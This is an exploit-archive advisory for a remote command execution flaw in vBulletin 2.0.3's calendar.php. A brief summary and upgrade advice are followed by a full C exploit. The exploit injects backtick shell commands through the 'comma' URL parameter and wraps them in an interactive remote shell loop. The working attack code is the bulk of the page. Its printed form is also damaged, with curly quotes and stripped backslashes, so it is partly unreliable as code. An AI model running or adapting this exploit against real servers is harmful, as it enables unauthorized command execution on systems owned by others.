‘vBulletin Calendar Command Execution Vulnerability (Exploit)’

Summary

‘A security vulnerability in vBulletin’s Calendar PHP script allows remote attackers to cause the product to execute arbitrary code, usually under the user ‘nobody’. This would allow a remote attacker to compromise parts of the operating system, possibly the complete operating system (by exploiting other vulnerabilities present to local users).’

Credit:

‘The information has been provided by gosper.’


Details

Vulnerable systems:
 * vBulletin version 2.0.3 and prior

Immune systems:
 * vBulletin versions 2.2.0 and later

Solution:
Upgrade to the latest version of the product.

Exploit:
/* php2.c – Vbulletin/calender.php remote command execution exploit
 *
 * This code is published property of gosper
 * leads to gid apache.
 *
 * thanks and shouts go out to ectos and tgrey 😉
 *
 * (C) COPYRIGHT Gosper , 2002 – gosper@nix.org
 * all rights reserved
 ***********************************************************************
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define PORT 80
#define MAX 200
#define evil1 ‘/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60’
#define evil2 ‘%20%60;die();echo%22’
 
char exploit(char *host, char *string);
void usage(char *progname);
void interactive(char *host, char *path);
void search_replace(char *string, const char *find, const char *replace);

int main(int argc, char *argv[])
{
  char buf[MAX], *command, *path, *host;
  int res;
  extern char *optarg;

    if(argc > 1) {
      host = argv[1]; // make things easier
         while((res = getopt(argc, argv, ‘i:c:p:d’)) != EOF) {
           switch(res){

            case ‘c’: command = optarg;
                  break;
      
            case ‘i’: path = optarg;
             //sprintf(buf, ‘GET %s%s%s%sn’ , path , evil1, command, evil2);
           interactive(host, path);
           //exit(0);
                 break;
      
                  case ‘d’: printf(‘%s’ , buf);

            default: usage(argv[0]);
                        break;
                 }

                    }
  
      sprintf(buf, ‘GET %s%s%sn’ , evil1, command, evil2);
      exploit(host, buf);
  }
else
   usage(argv[0]);
return 0;

}

char exploit(char *host, char *string){
 int fd, data;
 char buf[MAX], buf2[999], output[5000];

 struct hostent *he;
 struct sockaddr_in server;
 
   if((he =gethostbyname(host))==NULL) {
  printf(‘Error unknown host 🙁 n’);
    exit(-1);
  }

   if((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
  printf(‘Couldnt open socketn’);
      exit(-1);
   }

server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(server.sin_zero),8);

 if(connect(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1){
  printf(‘Couldnt connect to hostn’);
  exit(-1);
  }

  
  send(fd, string, sizeof(buf2), 0);
  recv(fd, output, sizeof(output), 0);
  printf(‘%s’ , output);

  close(fd);
 }

void interactive(char *host, char *path) {
  char shell[100], temp[MAX], *input;

  printf(‘n (C) Gosper 2002n’);
  printf(‘ vbull, calendar.php exploitn’);
  
        while(1){
  printf(‘php# ‘);
  fgets(shell, sizeof(shell), stdin);
  search_replace(shell, ‘ ‘, ‘%20’);
  input = malloc(strlen(shell)*sizeof(char));
  memcpy(input, shell, strlen(shell)-1);
  sprintf(temp, ‘GET %s%s%s%sn’ , path , evil1, input, evil2);
  exploit(host, temp);
  }
  }

void search_replace(char *string, const char *find, const char *replace)
   {

           char final[MAX], temp[2];
           size_t start, end, i;
           while (strstr(string, find) != NULL) {
                   final[0] = ‘’;
                   start = strstr(string, find) – string;
                   end = start + strlen(find);
                   temp[1] = ‘’;
                   strncat(final, string, start);
                   strcat(final, replace);
                   for (i = end; string[i] != ‘’; i++) {
                           temp[0] = string[i];
                           strcat(final, temp);
                   }
                   sprintf(string, final);
           }
           return;
   }

void usage(char *progname) {
 printf(‘____________________________________n’);
 printf(‘ calendar.php vbulletin exploitn’);
 printf(‘ (C) COPYRIGHT Gosper 2002n’);
 printf(‘ gosper@nix.orgnn’);
 printf(‘ Usage: %s host -i path to calendar.phpn’ , progname);
 printf(‘ Ex: %s 127.0.0.1 -i /bbsn’ , progname);
 exit(1);
 }’

Categories: Exploits